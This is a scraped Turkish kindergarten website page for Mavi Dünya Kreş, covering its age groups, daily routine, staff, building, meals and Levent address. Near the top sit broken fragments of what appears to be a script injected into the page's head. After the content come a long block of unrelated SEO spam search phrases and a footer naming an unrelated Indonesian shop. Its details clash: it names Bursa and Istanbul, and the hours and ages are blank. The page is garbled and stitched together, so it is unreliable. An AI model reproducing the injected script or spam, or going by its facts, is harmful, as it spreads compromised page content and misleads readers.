mavi dünya kreş / Özel Mavi Dünya Okulları – Bursa

Mavi Dünya Kreş

mavi dünya kreş

Çocuklarımız için Okulumuzda
Neyi Hedefliyoruz?

mavidunya
"; funduszeue.infomentsByTagName("head")[0].appendChild(funduszeue.infoodes[0]); }
"; funduszeue.infomentsByTagName("head")[0].appendChild(funduszeue.infoodes[0]); } '; funduszeue.infomentsByTagName('head')[0].appendChild(funduszeue.infoodes[0]); }

Merhaba Ben Ece,
kucağımda gördüğünüz çocuklar da kanımdan olan canım gibi sevdiğim kızlarım Karen ve Talya.

12 yıl önce “Sevginin adresi” ilkesiyle yola çıktığım Mavi Dünya’da, kanımdan olmayan ama canım gibi sevdiğim evlatlarınızın ağır sorumluluğunu taşımanın keyfiyle her güne çalışma arkadaşlarımla birlikte “Günaydın” diyorum.

Sevgiyle…

Yaş Gruplarımız

Mavi Dünya, yaş gruplarına hizmet vermesi için bakanlık tarafından Kreş Ruhsatı verilmiş bir kurumdur.

Çocuklarımız kendi yaş grupları içinde üç farklı grupta etkinliklerini sürdürmektedir, bu gruplar:

 

UMUT GRUBU yaş arası çocuklarımız
YILDIZLAR GRUBU yaş arası çocuklarımız
DÜNYA GRUBU yaş arası çocuklarımız

Mavi Dünya&#;da bir gün&#;

&#; saatleri arasında çocuklarımıza hizmet vermekteyiz.

Ana çizgileri ile günlük akışımız aşağıdaki gibidir.

SaatlerProgram
&#; Sabah kahvaltısı
&#; Ekinlikler / Faaliyetler
&#; Öğlen yemeği
&#; Öğlen uykusu
&#; İkindi kahvaltısı
&#; Serbest etkinlikler

Öğretmenlerimiz

Alanlarında lisans, ön lisans öğrenimi alan, aldıkları bilgiyi içselleştiren, &#;ekip&#; olmanın hazzı ile çalışan öğretmenlerimizin, &#;sevgi&#; temelli duruşları, sevgi temelli dokunuşları, sevgi temelli iletişim becerileri MAVİ DÜNYA’nın en önemli zenginliğidir.

Binamız

Yetkili kurum tarafından verilmiş, “Deprem Güvenirliği Belirleme Raporu” olan iki katlı, havadar ve aydınlık derslikleri olan şirin binamız çocuklarımız için sıcak bir ev ortamında hizmet vermektedir.

Bahçemiz

Bahçemiz, oyun parkları, tırmanma duvarları, meyve ağaçları ve çocuklarımızın elleriyle diktiği, hasadını kendilerinin yaptığı minik sebze bahçesiyle İstanbul’un şanslı mekânlarındandır.

Öğretim

Çocuklarımızın yaş gruplarına uygun ve bireysel farklıları dikkate alınarak, Milli Eğitim Bakanlığı temelli, Dil, Bilişsel, Duygusal, İnce ve Kaba Motor gelişimlerini destekleyen çalışmalar yapılmakta, bu çalışmalarda öğrenme ilkeleri esas alınmakta ve İlkokula başlayacak çocuklarımızın “Okul Olgunluğu ” na hazır olması sağlanmaktadır.

Beslenme

Hazır gıdayı reddeden ,&#;anneanne yemekleri&#; anlayışındaki mutfağımızda çocuklarımıza Sabah Kahvaltısı, Öğlen Yemeği ve İkindi Kahvaltısı verilmektedir. Değişik nedenlerle özel beslenmesi gereken çocuklarımız ve ek gıda alan kreş çocuklarımızın beslenmesi, çocuklarımızın doktorları ve velilerimizin yönlendirmesi doğrultusunda yapılmaktadır.

Eğitim

Mavi Dünya’yı sadece, çocukların sağlıklı ortamda ve güven içinde bakıldığı bir kurum olarak değerlendirmek kuşkusuz yeterli olmayacaktır. Eğitimin, davranış değişikliği ve bireysel farklılıkların dikkate alındığı bir süreç olduğunun bilincinde olan MAVi DÜNYA’da çocuklarımızın yönergelere uyması, değişik alanlarda yaşlarına uygun sorumluluk alması, kendi yaş grubuyla ve işbirliği yapabilmesi ve çevre bilinci oluşması konusunda çaba gösterilmektedir.

Okulumuz &#;Levent&#; semtindedir,
ancak diğer bazı ilçelere servisimiz bulunmaktadır, güncel servis durumunu öğrenmek için
lütfen WhatsApp veya diğer iletişim kanallarımızdan bizimle irtibata geçiniz.

Üstzeren Sokak No: 42 Levent, Besiktaş / İstanbul / Türkiye

T:+90 () 59 07

nest...

çamaşır makinesi ses çıkarması topuz modelleri kapalı huawei hoparlör cızırtı hususi otomobil fiat doblo kurbağalıdere parkı ecele sitem melih gokcek jelibon 9 sınıf 2 dönem 2 yazılı almanca 150 rakı fiyatı 2020 parkour 2d en iyi uçlu kalem markası hangisi doğduğun gün ayın görüntüsü hey ram vasundhara das istanbul anadolu 20 icra dairesi iletişim silifke anamur otobüs grinin 50 tonu türkçe altyazılı bir peri masalı 6. bölüm izle sarayönü imsakiye hamile birinin ruyada bebek emzirdigini gormek eşkiya dünyaya hükümdar olmaz 29 bölüm atv emirgan sahili bordo bereli vs sat akbulut inşaat pendik satılık daire atlas park avm mağazalar bursa erenler hava durumu galleria avm kuaför bandırma edirne arası kaç km prof dr ali akyüz kimdir venom zehirli öfke türkçe dublaj izle 2018 indir a101 cafex kahve beyazlatıcı rize 3 asliye hukuk mahkemesi münazara hakkında bilgi 120 milyon doz diyanet mahrem açıklaması honda cr v modifiye aksesuarları ören örtur evleri iyi akşamlar elle abiye ayakkabı ekmek paparası nasıl yapılır tekirdağ çerkezköy 3 zırhlı tugay dört elle sarılmak anlamı sarayhan çiftehan otel bolu ocakbaşı iletişim kumaş ne ile yapışır başak kar maydonoz destesiyem mp3 indir eklips 3 in 1 fırça seti prof cüneyt özek istanbul kütahya yol güzergahı aski memnu soundtrack selçuk psikoloji taban puanları senfonilerle ilahiler adana mut otobüs gülben ergen hürrem rüyada sakız görmek diyanet pupui petek dinçöz mat ruj tenvin harfleri istanbul kocaeli haritası kolay starbucks kurabiyesi 10 sınıf polinom test pdf arçelik tezgah üstü su arıtma cihazı fiyatları şafi mezhebi cuma namazı nasıl kılınır ruhsal bozukluk için dua pvc iç kapı fiyatları işcep kartsız para çekme vga scart çevirici duyarsızlık sözleri samsung whatsapp konuşarak yazma palio şanzıman arızası

© 2024 Toko Cleax. Seluruh hak cipta.